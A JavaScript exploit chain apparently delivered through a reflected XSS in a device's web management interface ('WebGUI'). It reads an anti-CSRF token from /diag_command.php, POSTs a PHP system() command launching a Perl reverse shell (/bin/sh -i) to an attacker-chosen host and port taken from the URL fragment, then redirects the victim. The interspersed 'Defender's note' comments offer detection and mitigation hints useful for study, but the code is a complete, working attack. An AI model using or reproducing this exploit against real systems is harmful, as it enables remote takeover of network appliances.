/**
 * Minimal XMLHttpRequest helper (no jQuery dependency).
 *
 * @param {string} url     Target URL; for non-POST requests `data` is appended as a query string.
 * @param {string} [method='GET'] HTTP method.
 * @param {?string} [data] URL-encoded body (POST) or query string (any other method).
 * @param {boolean} [async=false] Passed straight to XMLHttpRequest#open.
 * @returns {string} xhReq.responseText as it stands right after send() returns.
 *
 * The return value is only meaningful for the synchronous default: responseText is
 * read immediately after send(), without waiting for any readystatechange event.
 * Every request carries "X-Requested-With: XMLHttpRequest", and being issued from
 * page script it is subject to the browser's same-origin rules.
 */
function ajax(url, method, data, async){
    if (typeof method === 'undefined') {
        method = 'GET';
    }
    if (typeof async === 'undefined') {
        async = false;
    }

    // Legacy fallback for browsers that only expose the ActiveX transport.
    var xhReq = window.XMLHttpRequest
        ? new XMLHttpRequest()
        : new ActiveXObject("Microsoft.XMLHTTP");

    // Loose comparison kept on purpose so behaviour matches the original exactly.
    var isPost = (method == 'POST');
    var body = null;

    if (isPost) {
        body = data;
    } else if (typeof data !== 'undefined' && data !== null) {
        // Non-POST requests carry their parameters in the query string.
        url = url + '?' + data;
    }

    xhReq.open(method, url, async);
    if (isPost) {
        xhReq.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    }
    xhReq.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhReq.send(body);

    return xhReq.responseText;
}

// Run-time parameters are read from the URL fragment (everything after '#').
// Defender's note: the fragment is processed by the browser and is not part of the
// HTTP request line, so these values will not appear in the web server's access log
// for the page that loaded this script.
var hash = window.location.hash.substring(1);
// Text between "lhostlport=" and the first '&' of the fragment, expected as "host:port".
var lhostlport = hash.substring(hash.indexOf("lhostlport=")+11, hash.indexOf("&"));
var splitlhostlport = lhostlport.split(":");
var lhost = splitlhostlport[0];
var lport = splitlhostlport[1];
// Everything after "redir=" up to the end of the fragment; used later as the page
// the browser is sent to once the request has been made.
var redir = hash.substring(hash.indexOf("redir=")+6, hash.length);

// URL-encoded value for the txtPHPCommand form field. Decoded, it is a PHP system()
// call that starts /usr/local/bin/perl with a one-liner which opens a TCP connection
// to lhost:lport and attaches /bin/sh -i to it. lhost and lport are concatenated in
// exactly as read from the fragment.
// Defender's note: what to look for on the appliance is the web/PHP process spawning
// perl or /bin/sh, and an outbound TCP connection originating from the device itself.
var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%26%27%29%3B';

// Step 1: fetch the WebGUI page that embeds the anti-CSRF token.
// The request is a synchronous same-origin GET for /diag_command.php; the returned
// HTML is handed directly to extractToken().
// Defender's note: because the script runs inside the WebGUI's own origin, this read
// is permitted by the same-origin policy. An anti-CSRF token gives no protection
// once script injection into that origin is possible.
function loadToken(){
	extractToken(ajax('/diag_command.php'));
}
 
// Step 2: called with the HTML returned by the GET in loadToken(); extracts the
// anti-CSRF token from it and passes the token on to makeCSRF().
function extractToken(response){
	// `response` holds the source of the page requested through ajax().
	// The pattern matches the hidden __csrf_magic form input and captures the
	// contents of its value attribute.
	var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
	var token = response.match(regex);
	// The array returned by match() is discarded here: the token is taken from the
	// legacy static RegExp.$1 (first capture group of the most recent successful
	// match), a deprecated feature. If response is not a string, match() throws.
	token = RegExp.$1;
	// Hand the token to makeCSRF(), which sends the POST that carries it.
	makeCSRF(token);
}
 
// Step 3: send the state-changing POST to /diag_command.php, then navigate away.
// `token` is the __csrf_magic value obtained by extractToken().
// Defender's note: the request is issued from within the WebGUI origin, so it carries
// a valid token and a same-site Referer. Token and Referer checks therefore do not
// stop it; the control that matters is removing the script-injection point, and
// restricting who can reach the management interface.
// In server logs, the request is a POST to /diag_command.php with submit=EXECPHP and
// a non-empty txtPHPCommand.
function makeCSRF(token){
	var body = 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload
		+ '&submit=EXECPHP&__csrf_magic=' + token;
	// Synchronous POST; the response body is not used.
	ajax('/diag_command.php', 'POST', body);
	// Finally, send the browser to the URL supplied in the fragment's redir= parameter.
	document.location = decodeURIComponent(redir);
}

// The reflected XSS can fire several times on the same page; this guard makes the
// chain run only once.
// How it works (assuming this runs as a classic script at global scope): `var trigger`
// is hoisted, so the test below reads `undefined` on first execution instead of
// throwing. The else branch then defines and calls trigger(). On any later execution
// in the same page the global is already a function, so the empty if-branch is taken
// and nothing happens.
if (trigger){
    // Already ran in this page: do nothing.
} else {
    var trigger = function(){
		loadToken();
	};
	trigger();
}
